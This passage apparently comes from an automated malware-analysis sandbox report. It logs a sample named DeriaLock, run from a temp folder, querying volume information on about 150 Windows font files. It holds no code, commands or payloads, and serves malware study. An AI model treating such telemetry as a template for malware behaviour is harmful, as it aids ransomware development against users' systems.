        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
